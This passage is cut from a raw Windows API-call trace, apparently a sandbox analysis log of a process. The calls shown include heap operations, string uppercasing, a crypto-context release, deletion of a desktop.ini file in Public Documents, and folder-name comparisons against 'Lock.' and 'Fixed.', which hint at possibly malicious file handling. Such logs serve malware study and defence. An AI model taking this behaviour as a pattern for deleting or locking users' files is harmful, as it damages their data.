lpsz="SSA170020032E") returned 0xd [0223.286] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0223.286] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0223.286] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0223.286] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0223.286] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0223.286] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0223.286] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0223.286] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0223.286] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0223.286] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0223.286] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0223.286] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0223.286] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0223.286] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0223.286] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0223.286] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0223.287] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0223.287] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0223.287] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.287] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0223.287] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.287] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0223.287] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.287] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.287] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0223.287] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.287] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0223.287] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.287] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.287] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.287] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.287] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0223.287] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0223.287] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0223.287] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0223.287] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0223.287] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.287] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0223.287] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0223.287] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0223.287] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0223.288] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0223.288] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0223.288] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0223.288] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0223.288] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0223.288] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0223.288] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0223.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0223.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f70c0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0223.288] CryptReleaseContext (hProv=0xa7bef0, dwFlags=0x0) returned 1 [0223.288] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.288] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0223.288] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0223.288] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0223.288] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0223.288] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0223.288] FreeLibrary (hLibModule=0x76390000) returned 1 [0223.288] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.288] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.288] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.288] CloseHandle (hObject=0x4f4) returned 1 [0223.290] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.290] CloseHandle (hObject=0x4b0) returned 1 [0223.291] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.291] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0223.291] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents/desktop.ini", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\Public\\Documents\\desktop.ini", lpFilePart=0x8cedf4*="desktop.ini") returned 0x25 [0223.291] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Documents\\desktop.ini" (normalized: "c:\\users\\public\\documents\\desktop.ini")) returned 0x26 [0223.292] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\desktop.ini", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fb62ca, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fb62ca, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x116, dwReserved0=0x8cf060, dwReserved1=0x413764, cFileName="desktop.ini", cAlternateFileName="")) returned 0x9e1eb8 [0223.292] DeleteFileW (lpFileName="C:\\Users\\Public\\Documents\\desktop.ini" (normalized: "c:\\users\\public\\documents\\desktop.ini")) returned 1 [0223.292] FindNextFileW (in: hFindFile=0x9e1eb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fb62ca, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fb62ca, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x116, dwReserved0=0x8cf060, dwReserved1=0x413764, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0223.292] FindClose (in: hFindFile=0x9e1eb8 | out: hFindFile=0x9e1eb8) returned 1 [0223.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0223.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0223.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6c8 | out: hHeap=0x2af0000) returned 1 [0223.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0223.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5f0 | out: hHeap=0x2af0000) returned 1 [0223.293] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0223.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0223.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0223.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0223.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0223.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0223.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0223.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0223.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0223.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0223.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0223.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0223.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0223.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0223.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x29f7878 [0223.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0223.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0223.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0223.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0223.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0223.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6b0 [0223.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0223.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5f0 [0223.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0223.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0223.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab608 [0223.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0223.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab608 | out: hHeap=0x2af0000) returned 1 [0223.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0223.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5f0 | out: hHeap=0x2af0000) returned 1 [0223.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0223.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4c) returned 0x29eaef8 [0223.294] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents/desktop.ini", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\Public\\Documents\\desktop.ini", lpFilePart=0x8cf650*="desktop.ini") returned 0x25 [0223.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eaef8 | out: hHeap=0x2af0000) returned 1 [0223.294] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Documents\\desktop.ini" (normalized: "c:\\users\\public\\documents\\desktop.ini")) returned 0xffffffff [0223.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0223.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0223.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0223.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0223.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6b0 | out: hHeap=0x2af0000) returned 1 [0223.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0223.295] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0223.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0223.295] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0223.295] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0223.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0223.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0223.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6c8 [0223.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5f0 [0223.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0223.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0223.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0223.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0223.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0223.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0223.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0223.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0223.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0223.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="My Music", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0223.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y Music", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0223.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Music", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0223.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0223.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0223.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5f0 | out: hHeap=0x2af0000) returned 1 [0223.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0223.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0223.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6c8 | out: hHeap=0x2af0000) returned 1 [0223.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0223.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0223.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0223.296] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0223.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0223.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0223.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5f0 [0223.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0223.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0223.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0223.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0223.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0223.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0223.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0223.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab728 [0223.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0223.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0223.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0223.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0223.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0223.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0223.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0223.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x12) returned 0x29f7200 [0223.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0223.296] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="My Music", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0223.297] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y Music", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0223.297] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Music", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0223.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0223.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0223.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0223.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0223.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0223.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0223.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5f0 | out: hHeap=0x2af0000) returned 1 [0223.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab728 | out: hHeap=0x2af0000) returned 1 [0223.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0223.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0223.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0223.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0223.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0223.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0223.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0223.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0223.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0223.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0223.297] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0223.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0223.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0223.297] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0223.297] HeapFree (in: hHeap=0x2af0000, 